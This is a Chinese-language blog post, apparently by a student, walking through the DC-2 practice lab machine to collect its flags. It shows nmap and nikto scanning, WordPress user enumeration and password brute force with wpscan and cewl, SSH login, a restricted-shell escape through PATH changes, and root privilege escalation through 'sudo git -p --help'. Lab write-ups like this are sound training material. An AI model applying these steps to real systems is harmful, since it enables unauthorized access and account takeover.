DC-2

前言

最近老是因为睡不醒 核酸检测影响学习进度
那就找时间给自己镀金吧!!!
时间都是挤出来的!!!

正文

1.

使用nmap先探测该网段存活的主机

nmap 192.168.61.0/24

在这里插入图片描述
这里我们可以根据MAC地址来判断靶机的ip
并且可以发现是开启了80端口的服务

2.

这里就想起来以前遇到的一个东西
因为国内不能访问某些网站
了解到可以在hosts文件内添加该网站的ip
所以下面我们打开etc/hosts添加上一行

ip    DC-2

在这里插入图片描述
访问后可直接得到第一个flag
在这里插入图片描述根据翻译:
在这里插入图片描述

3.

分析后台可登录页面
利用nikto对ip进行普通扫描

nikto -h DC-2

查看ip下的信息
在这里插入图片描述在这里我们发现了wordpress
是可以登录的页面
下一步,对于使用wordpress搭建博客的师傅们,是很熟悉的,就是进入wordpress的后台登进页面

在这里插入图片描述
下面使用一个针对wordpress的扫描工具

wpscan
wpscan --update    更新
wpscan  --url dc-2 -e u   爆破出该页面可以登陆的amdin

得到一下信息
在这里插入图片描述
找到用户名
下面爆破密码
这里使用上面提到的cewl密码攻击工具

vim /tm/user,list     生成用户表
cat /tmp/user.list    查看用户表,使用的用户名都是上面爆破出来的
在这里插入图片描述
wpscan --url dc-2  -U /tmp/user.list  -P /tmp/password.list    爆破密码

在这里插入图片描述
登进
发现第二个flag
在这里插入图片描述

4.

使用tom用户进行ssh远程连接

ssh tom@dc-2  -p  7744

在这里插入图片描述
这里输入上一步爆破出来Tom用户的密码
这里我输错了两次…
成功后
我们查看所有的目录
在这里插入图片描述
这里失败了

查看命令存放目录和可食用的命令

echo $PATH

ls usr/bin

在这里插入图片描述
这里切换为bash的命令解释
在这里插入图片描述
bin/bash后可以使用运行上述命令
给Tom用户添加环境变量

export PATH=PATH:/usr/bin:/sbin

PATH用来定义/usr/bin:/sbin等这些路径的变量,其中冒号为目录间的分割符。
在这里插入图片描述
得到第三个flag

5.

切换回jerry用户

su jerry
在这里插入图片描述
cd /home/jerry

查看到flag4.txt
在这里插入图片描述
提示我们git
查看sudo文件

sudo是linux下常用的允许普通用户使用超级用户权限的工具,允许系统管理员让普通用户执行一些或者全部的root命令

发现要以root权限

这里提示git的话是不需要密码的

sudo git -p --help   //利用git进行提权
!whoami         //发现现在就是root权限
!password root    //修改密码

在这里插入图片描述
这里修改成功
登入
在这里插入图片描述
在这里插入图片描述

一些工具:

nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。
Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。

写在最后:
中间对linux命令不熟悉,有点卡住,在网上看了一些rbash限制绕过的文章和一些渗透笔记,只能说这一块内容是了解了,但一旦牵扯到其他内容就不会了。平时对linux的指令了解并不多,只是简单的管道符和一些特定的绕过替换方式一些使用。
这几天核酸检测可把我着实累坏了,但是必须做的是就是没有条件的服从,三下乡回来后就一直学习+睡觉。希望这轮疫情早点过去,能够让我出去跑步,聚餐…
加油!!!

发表评论

您的电子邮箱地址不会被公开。